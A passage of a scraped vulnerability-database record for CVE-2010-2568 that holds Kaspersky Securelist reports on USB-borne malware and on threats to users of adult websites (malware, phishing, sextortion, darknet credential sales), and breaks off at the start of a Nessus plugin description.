**Unique user count** \n---|---|--- \n2017 | 778,620 | 236,000 \n2018 (estimate based on H1) | 600,698 | 196,866 \n \nBetween H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.\n\nThe other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also been seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.\n\nThese results suggest that propagation via removable media works well for this threat.\n\nDetection data for Trojan.Win64.Miner.all is as follows:\n\n**Year** | **Detection data for** \n**Trojan.Win64.Miner.all ** | **Unique user count** | **YoY change** | **Unique user count as share of all users hit with a removable media threat** \n---|---|---|---|--- \n2016 | 4,211,246 | 245,702 | +70.15% | 4.2% \n2017 | 4,214,785 | 301,178 | +18.42% | 6.7% \n2018 (estimate based on H1) | 4,209,958 | 362,242 | +16.42% | 9.2% \n \n### Dark Tequila \u2013 advanced banking malware\n\nIn August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named [Dark Tequila](<https://securelist.com/dark-tequila-anejo/87528/>) that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.\n\nAccording to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.\n\n## Target geography\n\nEmerging markets appear to be the most vulnerable to infection by removable media.\n\nThe annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a 'local' incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. These figures appear to be remaining consistent into 2018.\n\nFor the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.\n\n_Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093438/180924-usb-threats-from-malware-to-miners-5.png>)\n\nThe reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win.64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% \u2013 likely to be impacted by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.\n\n_Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093415/180924-usb-threats-from-malware-to-miners-6.png>)\n\n## Conclusion and advice\n\nThe main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.\n\nUSB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.\n\nFortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.\n\nAdvice for all USB users:\n\n * Be careful about the devices you connect to your computer \u2013 do you know where it came from?\n * Invest in encrypted USB devices from trusted brands \u2013 this way you know your data is safe even if you lose the device\n * Make sure all data stored on the USB is also encrypted\n * Have a security solution in place that checks all removable media for malware before they are connected to the network \u2013 even trusted brands can be compromised through their supply chain\n\nAdditional advice for businesses:\n\n * Manage the use of USB devices: define which USB devices can be used, by whom and for what\n * Educate employees on safe USB practices \u2013 particularly if they are moving the device between a home computer and a work device\n * Don't leave USBs lying around or on display\n\nKaspersky Lab's security solutions, such as [Kaspersky Endpoint Security for Windows,](<https://www.kaspersky.co.uk/small-to-medium-business-security/endpoint-windows>) provide security and encryption for all removable media including USB devices.", "modified": "2018-09-25T10:00:57", "published": "2018-09-25T10:00:57", "id": "SECURELIST:048C7F20536D86F920F5CE9B67D02D6B", "href": "https://securelist.com/usb-threats-from-malware-to-miners/87989/", "type": "securelist", "title": "USB threats from malware to miners", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-13T12:52:04", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2568", "CVE-2017-8464"], "description": "\n\n[ **More graphs and statistics in full PDF version**](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/13112943/Threats_to_users_of_adult_websites_2018.pdf>)\n\n## Introduction\n\n2018 was a year that saw campaigns to decrease online pornographic content and traffic. For example, one of the most adult-content friendly platforms \u2013 Tumblr \u2013 announced it was [banning erotic content ](<https://www.theverge.com/2018/12/5/18126451/tumblr-porn-social-media-ban>) (even though [almost a quarter](<https://motherboard.vice.com/en_us/article/4xa8v3/so-how-much-porn-is-on-tumblr>) of its users consume adult content). In addition, the UK received the title of '[The Second Most Porn-Hungry Country in the World](<http://www.gizmodo.co.uk/2018/12/the-uk-is-still-the-second-most-porn-hungry-country-in-the-world-according-to-pornhub/>)' and is now [implementing a law on age-verification for pornography lovers](<https://uk.news.yahoo.com/porn-sites-will-require-proof-age-april-next-year-123901041.html>) that will prohibit anyone below the age of 18 to watch this sort of content. This is potentially[ opening a world of new tricks](<https://news.sky.com/story/academics-doubt-value-of-online-porn-age-checks-10952614https:/news.sky.com/story/academics-doubt-value-of-online-porn-age-checks-10952614>) for scammers and threat actors to take advantage of users. In addition, even commercial giant Starbucks [declared a 'holy war' on porn](<https://www.nbcnews.com/news/us-news/starbucks-says-it-will-start-blocking-pornography-its-stores-wi-n941646>) as it was revealed that many visitors prefer to have their coffee while consuming adult content, rather than listening to music or reading the latest headlines on news websites.\n\nSuch measures might well be valid, at least from a cybersecurity perspective, as the following example suggests. According to news reports last year, an extremely active [adult website user](<https://www.oversight.gov/sites/default/files/oig-reports/ManagementAdvisory%20_USGSITSecurityVulnerabilities_101718_0.pdf>), who turned out to be a government employee, dramatically failed to keep his hobby outside of the workplace. By accessing more than 9,000 web pages with adult content, he compromised his device and subsequently infected the entire network with malware, leaving it vulnerable to spyware attacks. This, and other examples confirm that adult content remains a controversial topic from both a social and cybersecurity standpoint.\n\nIt is no secret that digital pornography has long been associated with malware and cyberthreats. While [some](<https://www.kaspersky.com/blog/porno-danger-fact-or-fiction/21865/>) of these stories are now shown to be myths, others are very legitimate. A year ago, we conducted [research](<https://www.kaspersky.com/blog/porn-themed-threats-report/20891/>) on the malware hidden in pornography and found out that such threats are both real and effective. One of the key takeaways of last year's report was the fact that cybercriminals not only use adult content in multiple ways \u2013 from lucrative decoys to make victims install malicious applications on their devices, to topical fraud schemes used to steal victims' banking credentials and other personal information \u2013 but they also make money by stealing access to pornographic websites and reselling it at a cheaper price than the cost of a direct subscription.\n\nLast year, we discovered a number of malicious samples that were specifically hunting for credentials to access some of the most popular pornographic websites. When we considered why someone would hunt for credentials to pornographic websites, we checked the underground markets (both on the dark web and on open parts of the internet) and found that credentials to pornography website accounts are themselves quite a valuable commodity to be sold online. They are for sale in their thousands.\n\nIt would be going too far to say that the findings from our previous exploration of the relationships between cyberthreats and adult content were unexpected. At the end of the day, pornography has always been, and remains one of the most sought after types of online content. At the same time, cybercriminals have always looked to increase their profits with the most efficient and cheapest way of delivering malicious payloads to victims. It was almost inevitable that adult content would become an important tool for them.\n\nThat said, our monitoring of the wider cyberthreat landscape shows that threat actors tend to change their habits, tactics and techniques over time. This means that even in a niche area, such as pornographic content and websites, changes are possible. That is why this year we decided to repeat our exercise and investigate the topic once again. As it turned out, some things have indeed changed.\n\n## Methodology and key findings\n\nTo measure the level of risk that may be associated with adult content online, we investigated several different indicators. We examined malware disguised as pornographic content, and malware that hunts for credentials to access pornography websites. We looked at the threats that are attacking users across the internet in order to find out which popular websites might be dangerous to visit. Additionally, we checked our phishing and spam database to see if there is a lot of pornographic content on file and how is it used in the wild. Using aggregated threat-statistics obtained from the Kaspersky Security Network \u2013 the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world \u2013 we measured how often and how many users of our products have encountered adult-content themed threats.\n\nAdditionally, we checked around twenty underground online markets and counted how many accounts are up for sale, which are the most popular, and the price they are sold for.\n\nAs a result, we discovered the following:\n\n * **Searching for pornography online has become safer:** in 2018, there were **650,000 attacks** launched from online resources. That is **36% less **than in 2017 when more than a million of these attacks were detected.\n * **Cybercriminals are actively using popular porn-tags to promote malware in search results. **The 20 most popular make up 80% of all malware disguised as porn. Overall, 87,227 unique users downloaded porn-disguised malware in 2018, with 8% of them using a corporate rather than personal network to do this.\n * **In 2018, the number of attacks using malware to hunt for credentials that grant access to pornography websites grew almost three-fold compared to 2017,** with more than 850,000 attempts to install such malware. The number of users attacked doubled, with 110,000 attacked PCs across the world.\n * The number of** unique sales offers of credentials for premium accounts to adult content websites almost doubled** to more than **10,000**.\n * **Porn-themed threats increased in terms of the number of samples, but declined in terms of variety:** In 2018, Kaspersky Lab identified at least **642 families of PC threats** disguised under one common pornography tag. In terms of their malicious function, these families were distributed between **57 types **(76 last year**)**. In most cases they are are **Trojan-Downloaders, Trojans and AdWare.**\n * **89%** of infected files disguised as pornography on Android devices turned out to be **AdWare**.\n * In Q4 2018, there were 10 times as many attacks coming from phishing websites pretending to be popular adult content resources, compared to Q4 2017 when the overall figure reached **21,902 attacks**.\n\n## Part 1 - Malware\n\nAs mentioned above, cybercriminals put a lot of effort into delivering malware to user devices, and pornography serves as a great vehicle for this. Most malware that reaches users' computers from malicious websites is usually disguised as videos. Users who do not check the file extension and go on to download and open it, are sent to a webpage that extorts money. This is achieved by playing the video online or for free only after the user agrees to install a malicious file disguised as a software update or something similar. However, in order to download anything from this kind of website, the user first has to find the website. That is why the most common first-stage infection scenarios for both PC and mobile porn-disguised malware involve the manipulation of search query results.\n\nTo do this, cybercriminals first identify which search requests are the most popular among users looking for pornography. They then implement so-called 'black SEO' techniques. This involves changing the malicious website content and description so it appears higher up on the search results pages. Such websites can be found in third or fourth place in the list of search results.\n\nAccording to our findings, this method is still actively used but its efficiency is falling. To check this, we took 100 of the top listed pornographic websites (as suggested by search engines after entering a query for the word 'porn'), plus those that have the word 'porn' in the title. We checked if any of them pose any threat to users. It turned out that in 2017 our products stopped more than a million users from attempting to install malware from websites on the list. However, in 2018, the number of users affected decreased to 658,930. This could be the result of search engines putting processes in place to fight against 'black SEO' activities and protecting users from malicious content.\n\n### Porn tags = Malware tags\n\nOptimizing malicious websites so as to ensure that those wanting to view adult content will find them is not the only tool criminals explore in order to find the best ways of delivering infected files to victims' devices. It turned out during our research that cybercriminals are disguising malware or not-a-virus files as video files and naming them using popular porn tags. A 'porn tag' is a special term that is used to easily identify content from a specific pornographic video genre. Tags are used by pornography websites to organize their video libraries and help users to quickly and conveniently find the video they are interested in. The not-a-virus type of threats is represented here by RiskTools, Downloaders and AdWare. Each type is not typically classified as malware, yet such applications may do something unwanted to users. AdWare, for instance, can show users unsolicited advertising, alter search results and collect user data to show targeted, contextual advertising.\n\nTo check how widespread this trend is, we took the most popular classifications and tags of adult videos from three major legal websites distributing adult content. The groupings were chosen by the overall number of videos uploaded in each category on the websites. As a result, we came up with a list of around 100 tags, which between them may well cover every possible type of pornography in existence. Subsequently, we ran those tags against our database of threats and through the Kaspersky Security Network databases and figured out which of them were used in malicious attacks and how often.\n\nThe overall number of users attacked with malware and not-a-virus threats disguised as porn-themed files dropped by about half compared to 2017. While back then their total number was 168,702, the situation in 2018 was a little more positive: down to 87,227, with 8% of them downloading porn-disguised malware from corporate networks. In this sense, scammers are merely following the overall trend: according to Pornhub's statistics, the share of pornography viewed on desktops has dropped by 18%. However, we were not able to get full confirmation that the 2018 decrease in the number of users attacked with malicious pornography relates to changes in consumer habits.\n\nPerhaps one of the most interesting takeaways we got from the analysis of how malware and not-a-virus are distributed among porn tags, is that although we were able to identify as many as 100 of them, most of the attacked users (around 80%, both in 2017 and 2018) encountered threats that mention only 20 of them. The tags used most often match the most popular tags on legitimate websites. Although we couldn't find perfect correlations between the top watched types of adult video on legitimate websites and the most often encountered porn-themed threats, the match between malicious pornography and safe pornography means that malware and not-a-virus authors follow trends set by the pornography-viewing community.\n\nMoving forward, the overall picture surrounding porn-disguised threat types showed more changes in 2018 when compared to 2017. In 2018, we saw 57 variations of threats disguised as famous porn tags, from 642 families. For comparison, the figures in 2017 were 76 and 581 respectively. That means that while the number of samples of porn-malware is growing, the number of types of malware and not-a-virus that are being distributed through pornography is decreasing.\n\nThe top three most popular classes of threats turned out to be Trojan-Downloader, with 45% of files, Trojan with 20% and AdWare, which is not a virus, with 9%, while in 2017 the top three were different: Trojan-Downloader was still there with 29%, exploits took the second place with 23% and Trojans accounted for around 19%.\n\nDistribution of porn-themed threat types in 2017 | Distribution of porn-themed threat types in 2018 \n---|--- \nTrojan-Downloader | 29% | Trojan-Downloader | 45% \nExploit | 23% | Trojan | 20% \nTrojan | 19% | AdWare (not a virus) | 9% \nAdWare (not a virus) | 11% | Worm | 8% \nWorm | 6% | Virus | 2% \nVirus | 2% | Downloader (not a virus) | 2% \nRiskTool (not a virus) | 2% | Exploit | 2% \nDownloader (not a virus) | 2% | Trojan-Dropper | 2% \nTrojan-Dropper | 1% | UDS: DangerousObject | 2% \nOther | 5% | Other | 8% \n \n_Top-10 types of threat that went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network_\n\n_Top-10 verdicts which went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20151847/threats-to-users-of-adult-websites-in-2018-2.png>)\n\nThe most noticeable change in the overall picture is the large number of exploits in 2017: back then they accounted for almost a quarter of all infected files, while in 2018 they were not represented in the top 10. There is an explanation for the popularity of such threats. In 2017, exploits were represented by massive detections of Exploit.Win32.CVE-2010-2568.gen, a generic detection (the detection that describes multiple similar malware pieces) for files that exploited the vulnerability in the Windows Shell named [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>). However, the same detection name applies for another vulnerability in LNK - [CVE-2017-8464.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>) This vulnerability, and the publicly available exploit for it, became public in 2017 and immediately raised a lot of interest amongst threat actors \u2013 thereby raising the bar in exploit detections. Within a year, the attacks on CVE-2017-8464 reduced significantly as most users patched their computers and malware writers went back to using classical malware aimed at more common file formats (such as JS, VBS, PE).\n\nThe rise in popularity of Trojan-Downloaders can be explained by the fact that such malicious programs are multipurpose: once installed on a victim's device, the threat actor could additionally download virtually any payload they want: from DDoS-bots and malicious ads clickers to password stealers or banking Trojans. As a result, a criminal would need to infect the victim's device only once and would then be able to use it in multiple malicious ways.\n\n2018 has also seen some changes in the share of software that is not-a-virus. All in all, such programs accounted for 15% of all threats in 2017. In 2018, however, they were on the decline and now account for 11%, with downloaders losing their place in the top-10 most prolific threats. So, while the attackers are using porn less as a decoy, they have yet to inject the malicious files with more harmful threats, such as Trojans and worms.\n\n### Mobile malware\n\nFollowing technical changes in how we detect and analyze mobile malware, we amended our methodology for this report. Instead of trying to identify the share of porn-themed content in the overall volume of malicious applications that our users encountered, we selected 100,000 random malicious installation packages disguised as porn videos for Android, in 2017 and 2018, and checked them against the database of popular porn tags.\n\nThe landscape for types and families of mobile threats is also different than for PC. In both 2017 and 2018, the most common type of threat was AdWare: 70% in 2017 and 89% in 2018.\n\n**Malware name** | **%** | **Malware name** | **%** \n---|---|---|--- \nnot-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 59.61% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 62.88% \nnot-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 11.02% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 17.09% \nHEUR:Trojan-Ransom.AndroidOS.Zebt.a | 5.33% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 9.62% \nHEUR:Trojan.AndroidOS.Loapi.b | 3.76% | HEUR:Trojan-Ransom.AndroidOS.Zebt.a | 3.27% \nHEUR:Trojan-Ransom.AndroidOS.Small.snt | 2.22% | HEUR:Trojan.AndroidOS.Boogr.gsh | 0.74% \nHEUR:Trojan-Dropper.AndroidOS.Agent.hb | 1.93% | HEUR:Trojan-Ransom.AndroidOS.Small.snt | 0.74% \nnot-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 1.90% | UDS:DangerousObject.Multi.Generic | 0.52% \nHEUR:Trojan-Ransom.AndroidOS.Small.as | 1.54% | HEUR:Trojan-Ransom.AndroidOS.Small.as | 0.41% \nHEUR:Trojan-Ransom.AndroidOS.Small.cj | 1.29% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 0.36% \nnot-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 1.07% | HEUR:Trojan-Ransom.AndroidOS.Small.cj | 0.36% \n \n_Top-10 verdicts that represent porn-related categories, by the number of attacked mobile users, in 2017 and 2018. Source: Kaspersky Security Network_\n\nThese threats are typically distributed through affiliate programs focused on earning money as a result of users installing applications and clicking on an advertisement. As well as AdWare, pornography is also used to distribute ransomware (4% in 2018) but on a much smaller scale compared to 2017, when more than 10% of users faced such malicious programs. This decline is most likely a reflection of the overall downward trend for ransomware seen in the malware landscape.\n\n### Credential hunters\n\nA specific type of malware related to pornography, which we have been tracking throughout the year, is implemented by so-called credential hunters. We track them with the help of our botnet-tracking technology, which monitors active botnets and receives intelligence on what kind of activities are they perform, to prevent emerging threats.\n\nWe particularly track botnets that are made of malware.Upon installation on a PC, this malware can monitor which web pages are opened, or create a fake one where the user enters their login and password credentials. Usually such programs are made for stealing money from online banking accounts, but last year we were surprized to discover that there are bots in these botnets that hunt for credentials to pornography websites.\n\nBased on the data we were able to collect, in 2017 there were 27 variations of bots, belonging to three families of banking Trojans, attempting to steal credentials (Betabot, Neverquest and Panda). These Trojans were after credentials to accounts for 10 famous adult content websites (Brazzers, Chaturbate, Pornhub, Myfreecams, Youporn, Wilshing, Motherless, XNXX, X-videos). During 2017, these bots attempted to infect more than 50,000 users over 307,000 times.\n\nIn 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world. The number of attacks almost tripled, to 850,000 infection attempts. At the same time, the number of variations of malware we were able to spot fell from 27 to 22, but the number of families increased from three to five, meaning that pornography credentials are considered valuable to ever more cybercriminals.\n\nAnother important shift that happened in 2018, was that malware families do not hunt for credentials to multiple websites. Instead, they focus on just two: mostly Pornhub and XNXX, whose users were targeted by bots belonging to the Jimmy malware family.\n\nApparently Pornhub remains popular, not only to regular users of the web, but also to cybercriminals looking for another way of gaining illegal profits by selling user credentials.\n\n## Part 2 - Phishing and spam\n\nOur previous research suggested that it is relatively rare to see pornography as a topic of interest in phishing scams. Instead, criminals prefer to exploit popular sites dedicated to finding sex partners. But in 2018, our anti-phishing technologies started blocking phishing pages that resemble popular pornography websites.\n\nThese are generally pages disguised as pornhub.com, youporn.com, xhamster.com, and xvideos.com. In Q4, 2017, the overall number of attempts to access phishing pages pretending to be one of the listed websites was **1,608**. Within a year, in Q4 2018, the number of such attempts (**21,902**) was more than ten times higher.\n\nThe overall number of attempts to visit phishing webpages pretending to be one of the popular adult-content resources was **38,305**. Leading the list of accessed phishing pages were those that were disguised as a Pornhub page. There were **37,144** attempts to visit the phishing version of the website, while there were only **1,161** attempts to visit youporn.com, xhamster.com, and xvideos.com in total. These figures are still relatively low, other phishing categories may see detection results of millions of attempts per year. However, the fact that the number of detections on pornography pages is growing may mean that criminals are only just beginning to explore the topic.\n\nIt is worth mentioning that phishing pages cannot influence the original page in any way; they merely copy it. The authentic Pornhub page is not connected to the phishing. Moreover, most search engines usually successfully block such phishing pages, so the most likely way to access them is through phishing or spam e-mails, or by being redirected there by malware or a malicious frame on another website.\n\nFake versions of popular pornography websites target users' credentials and contact details, which can later be either sold or used in other fraud schemes or cyberattacks. In general, credentials capture is one of the most popular ways to target users, using pornography to implement phising fraud schemes. In such schemes, the victim is often lured to a phishing website disguised as a social network, where they are asked to authenticate their identity in order to watch an adult video which can only be accessed if the user confirms they are over 18-years-old.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160843/threats-to-users-of-adult-websites-in-2018-5.png>)\n\nAs the victim enters their password, the threat actor captures the credentials to the user's social network account.\n\nPornographic content phishing can also be used to install malicious software. For example, to access an alleged adult video, the phishing page requires the user to download and update a video player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160919/threats-to-users-of-adult-websites-in-2018-6.png>)\n\nNeedless to say, instead of downloading a video player, the user downloads malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160946/threats-to-users-of-adult-websites-in-2018-7.png>)\n\nSometimes phishing fraudsters target e-wallet credentials with the help of pornographic content. The victim is lured to the pornographic website to watch a video broadcast. In order to view the content, the user is asked to enter their payment credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21093209/threats-to-users-of-adult-websites-in-2018-8.png>)\n\n### **Spam-scam**\n\nWe have rarely seen pornographic content used in any special or specific way when it comes to spam. Apart from the mass distribution of 'standard' advertising offering adult content on legitimate and illegal websites, this type of threat hasn't been spotted using pornography in a creative way. However, there is one exception. Beginning in 2017, an infamous sextortion scam started to happen. Users started to receive messages containing an extortion letter with a demand to transfer bitcoins to fraudsters.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143648/threats-to-users-of-adult-websites-in-2018-9.png>)\n\nThe scammers claimed to have personal messages and recordings of the victim watching porn. The letters even claimed that the threat actor could combine the video that the supposed victim was watching with what was recorded through their webcam. This extortion is based purely on making threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143709/threats-to-users-of-adult-websites-in-2018-10.png>)\n\n2018, however, saw an increase in the volume of such e-mails. Moreover, they became more sophisticated and were not only threatening the user, but also 'proving' the legitimacy of the scammers claims by providing the user with actual information about them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143739/threats-to-users-of-adult-websites-in-2018-11.png>)\n\nIn most cases, it was either a password, or a phone number, or a combination of both with an e-mail address. Since people tend to use the same passwords for different websites, the victim was often likely to believe that paired passwords and e-mail addresses found by the criminal on the dark web were authentic, even if they were not actually correct for the adult-content account in question.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143805/threats-to-users-of-adult-websites-in-2018-12.png>)\n\nFurthermore, these e-mails have been sent out in more languages than previously found.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143826/threats-to-users-of-adult-websites-in-2018-13.png>) | [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143902/threats-to-users-of-adult-websites-in-2018-14.png>) \n---|--- \n \nIn reality, these mailings were based purely on the assumption that the target of such e-mails would hand over their credentials and that these would become profitable. The number of such scams grew in 2018.\n\n## Part 3 - Darknet insights\n\nOne of the burning topics of the adult-content industry is the controversy surrounding paid subscriptions to access websites. It is often the case that users can register for pornography accounts through a 'premium' subscription model (that includes no advertisements and unlimited access to the adult website content). Otherwise, the website they want to access does not allow them to watch any free content at all unless they pay. At most, the user may see video previews for free but still be expected to make a payment to watch the full video. The opinions around such practice vary. Some people [claim](<https://fightthenewdrug.org/problem-with-paying-for-porn-or-watching-for-free/>) that money paid for porn \"directly fuels the industry that supports the abuse, exploitation, and trafficking around the world\". [Others argue](<https://www.self.com/story/this-is-why-you-should-pay-for-porn>) that pornography is like most other commodities and people are willing to exchange money for it just as they would other kinds of entertainment, such as tv-series or music. Some though prefer to highlight examples of when adult content can result in people being denied their human rights.\n\nWhether it is worth it or not, [some](<https://www.die-screaming.com/porn-memberships-expensive-429291/>) users agree that the price of premium accounts to popular pornography websites is rather high. For example, monthly memberships can vary from $20 to $30, and annual unlimited access costs might scale from $120 to $150. This is where cybercriminals enter the fray.\n\nThe research on porn-related cyberthreats we did previously proved that there is a very well developed supply and demand chain for stolen credentials on the dark web. We conducted research on this issue again in 2018, analyzing 20 of the top-rated Tor marketplaces listed on DeepDotWeb - an open Tor site that contains a dynamic ranking of dark markets evaluated by Tor administrators based on customers' feedback. All of them contained one to more than 3,000 offers for credentials to adult content websites. In total, 29 websites displayed more than 15,000 offers to buy one or more accounts to pornography websites (with of course, no legal guarantees of delivering on their promise).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143918/threats-to-users-of-adult-websites-in-2018-15.jpg>) | [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21093226/threats-to-users-of-adult-websites-in-2018-16.jpg>) \n---|--- \n \nThe results of the research conducted in the last year showed that four of the researched markets that offered the widest range of stolen credentials provided users with more than 5,239 unique offers. The figure for 2018 showed that their number doubled, accounting for more than 10,000 offers on sale.\n\nThe quantity of accounts available ranged from 1 to 30, with a few exceptions mostly from poorly rated sellers. However, the majority of offers promised to deliver credentials to only one account. Regardless of the type of account, the prices vary from $3 to $9 per offer, very rarely exceeding $10 \u2013 the same as back in 2017, with the vast majority of prices being limited to $6-$7 or the equal amount in bitcoins, which is 20 times cheaper than the most modest annual memberships. Getting access to an account illegally for a lower cost than a legal subscription is not the only appeal of buying such credentials on the dark web. There is the added appeal of anonymity, hiding behind other people's credentials while watching pornography.\n\n## Conclusions and advice\n\nOverall, the amount of downloadable malware disguised as pornography detected on users' devices significantly decreased in 2018 in comparison with record activity in 2017. While at first glance this looks like good news, a worrying trend has appeared. The number of users being attacked with malware that hunts for their pornographic content credentials is on the rise and this means premium subscriptions are now a valuable asset for cybercriminals. There is also the fact that many modern pornography websites include social functionality, allowing people to share their own private content in different ways through the website. Some people make it freely available for all, some decide to limit who can see it. There has also been a significant rise in the number of cases where people suffer from sextortion. In other words, the sphere of adult-content may contain cybersecurity challenges other than the 'classic' infected pornography websites and video files armed with malware. These challenges should be addressed properly.\n\nAnother cybersecurity risk that adult content brings, which may be less obvious, is the misuse of corporate resources. As mentioned at the beginning of this report, the unsafe consumption of pornography from the workplace may result in the corporate network being hit by a massive infection. While most malicious attacks using pornography are aimed at consumers not corporations, the fact that most consumers have job to go to every day, brings a certain risk to IT administrators responsible for securing corporate networks.\n\nIn order to consume and produce adult content safely, Kaspersky Lab advises the following:\n\n**For consumers:**\n\n * Before clicking any link, check the link address shown, even in the search results of trusted search engines. If the address was received in an e-mail, check if it is the same as the actual hyperlink.\n * Do not click on questionable websites when they are offered in search results and do not install anything that comes from them.\n * If you wish to buy a paid subscription to an adult content website \u2013 purchase it only on the official website. Double check the URL of the website and make sure it is authentic.\n * Check any email attachments with a security solution before opening them \u2013especially from dark web entities (even if they are expected to come from an anonymous source).\n * Patch the software on your PC as soon as security updates for the latest bugs are available.\n * Do not download pirated software and other illegal content. Even if you were redirected to the webpage from a legitimate website.\n * Use a reliable security solution with behavior-based anti-phishing technologies \u2013 such as [Kaspersky Total Security](<https://www.kaspersky.com/downloads/thank-you/total-security-free-trial>), to detect and block spam and phishing attacks.\n * Use a robust security solution to protect you from malicious software and its actions \u2013 such as the [Kaspersky Internet Security for Android](<https://www.kaspersky.com/android-security>).\n\n**For businesses:**\n\n * Educate employees in basic security hygiene, and explain the policies on accessing web sites potentially containing illegal or restricted content, as well as not opening emails or clicking on links from unknown sources.\n * Businesses can also block access to web sites that contravene corporate policy, such as porn sites, by using a dedicated endpoint solution such as [Kaspersky Endpoint Security for Business](<https://www.kaspersky.com/small-to-medium-business-security/endpoint-advanced>). In addition to anti-spam and anti-phishing, it must include application and web controls, and web threat protection that can detect and block access to malicious or phishing web addresses.", "modified": "2019-02-21T10:00:01", "published": "2019-02-21T10:00:01", "id": "SECURELIST:82490B192CB8F0CC0E1B0205E044FDB8", "href": "https://securelist.com/threats-to-users-of-adult-websites-in-2018/89634/", "type": "securelist", "title": "Threats to users of adult websites in 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-04-01T06:15:45", "description": "The remote windows host contains a version of the Windows Shell that\ncontains a vulnerability in the way it handles shortcut icons. An\nattacker, exploiting this flaw, can execute arbitrary commands on the\nremote host subject to the privileges of the user opening the\nshortcut.\n\nEASYHOOKUP is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.", "edition": 32, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2010-08-02T00:00:00", "title": "MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198) (EASYHOOKUP)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2568"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-046.NASL", "href": "https://www.tenable.com/plugins/nessus/48216", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48216);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2010-2568\");\n script_bugtraq_id(41732);\n script_xref(name:\"CERT\", value:\"940193\");\n script_xref(name:\"EDB-ID\", value:\"14403\");\n script_xref(name:\"MSFT\", value:\"MS10-046\");\n 